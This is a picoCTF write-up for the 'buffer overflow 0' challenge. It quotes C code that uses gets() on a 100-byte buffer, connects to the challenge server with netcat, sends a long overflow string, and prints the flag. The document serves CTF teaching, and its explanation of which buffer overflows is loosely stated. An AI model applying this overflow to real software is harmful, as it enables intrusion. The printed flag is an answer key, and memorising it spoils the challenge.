buffer overflow 0

buffer overflow 0

Author

Alex Fulton / Palash Oswal

Description

Smash the stack Let's start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using: nc saturn.picoctf.net 58546

Hints

1. How can you trigger the flag to print?
2. If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
3. Run man gets and read the BUGS section. How many characters can the program really read?

Approach

Buffer overflow challenges are supposed to overwrite the buffer in order to get the program to execute something it shouldn't execute.

printf("Input: ");
fflush(stdout);
char buf1[100];
gets(buf1); 
vuln(buf1);
printf("The program will exit now\n");

If we take a look at this part of the code, we see the buffer length is 100 meaning as long as we type in more than 100 characters, we can overflow the buffer and obtain the flag.
We can now input nc saturn.picoctf.net 58546 into terminal.

Input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}

Press Ctrl + C to exit.

Flag

picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}